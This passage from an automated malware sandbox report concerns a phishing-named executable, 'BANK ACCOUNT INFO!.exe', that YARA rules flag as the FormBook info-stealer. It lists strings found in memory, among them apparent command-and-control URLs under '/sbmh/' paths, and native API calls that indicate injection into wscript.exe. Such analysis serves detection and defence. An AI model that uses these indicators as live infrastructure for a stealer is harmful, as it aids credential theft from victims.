Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.friendlyksa.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.friendlyksa.com/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.friendlyksa.com/sbmh/www.ablehead.net
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.friendlyksa.comReferer:
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.hoy.viajes
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.hoy.viajes/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.hoy.viajes/sbmh/www.firedoom.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.hoy.viajesReferer:
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.katrinarask.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.katrinarask.com/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.katrinarask.com/sbmh/www.wellnysdirect.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.katrinarask.comReferer:
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.magentos6.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.magentos6.com/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.magentos6.com/sbmh/www.elegancerealestategroup.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.magentos6.comReferer:
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.makgxoimisitzer.info
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.makgxoimisitzer.info/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.makgxoimisitzer.info/sbmh/www.downrangedynamics.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.makgxoimisitzer.infoReferer:
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.meatslasvegas.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.meatslasvegas.com/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.meatslasvegas.com/sbmh/www.salon-massage-linit.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.meatslasvegas.comReferer:
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.parking500.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.parking500.com/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.parking500.com/sbmh/www.faculdadegraca.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.parking500.comReferer:
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.salon-massage-linit.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.salon-massage-linit.com/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.salon-massage-linit.com/sbmh/N
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.salon-massage-linit.comReferer:
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellnysdirect.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellnysdirect.com/sbmh/
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellnysdirect.com/sbmh/www.exposingsecrets.com
Source: explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellnysdirect.comReferer:
Source: explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: wscript.exe, 00000004.00000002.479367974.000000000546F000.00000004.00000001.sdmp	String found in binary or memory: https://www.wellnysdirect.com/sbmh/?FPWlMXx=

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041A050 NtClose,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041A100 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_00419F20 NtCreateFile,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_00419FD0 NtReadFile,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_00419FCA NtReadFile,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014BB040 NtSuspendThread,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014BA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9A10 NtQuerySection,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9560 NtWriteFile,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014BAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9760 NtOpenProcess,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014BA770 NtOpenThread,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014BA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B96D0 NtCreateKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB95F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04ABAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9560 NtWriteFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04ABA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04ABA770 NtOpenThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04ABB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9A10 NtQuerySection,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04ABA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AB9B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DA050 NtClose,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005DA100 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005D9F20 NtCreateFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005D9FD0 NtReadFile,
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_005D9FCA NtReadFile,

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 0_2_00482050
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 0_2_00486C64
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041D853
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_00401030
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041D38E
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_00402D88
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_00402D90
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_00409E30
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0041E73A
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_00402FB0
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_00992050
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_00996C64
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0147F900
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01494120
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014999BF
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531002
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0154E824
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149A830
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_015428EC
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0148B090
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A20A0
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_015420A8
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149AB40
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0151CB4F
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149A309
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01542B28
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0153DBD2
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_015303DA
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AABD8
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_015223E3
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A138B
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AEBB0
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0152FA2B
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B236
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534AEF
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_015422AE
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01541D55
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01542D07
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01470D20
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_015425DD
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0148D5E0
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A2581
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01532D82
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0153D466
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0148841F
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0154DFCE
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01541FF1
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0153D616
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01496E30
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01542EF7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A8841F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B3D466
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA2581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B32D82
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A8D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B425DD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A70D20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B42D07
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B41D55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B21EB6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B42EF7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A96E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B3D616
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A95600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B41FF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B4DFCE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA20A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B420A8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A8B090
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B428EC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B4E824
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9A830
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31002
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A999BF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A94120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A7F900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B422AE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34AEF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B2FA2B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B236
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAEBB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA138B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9EB9A
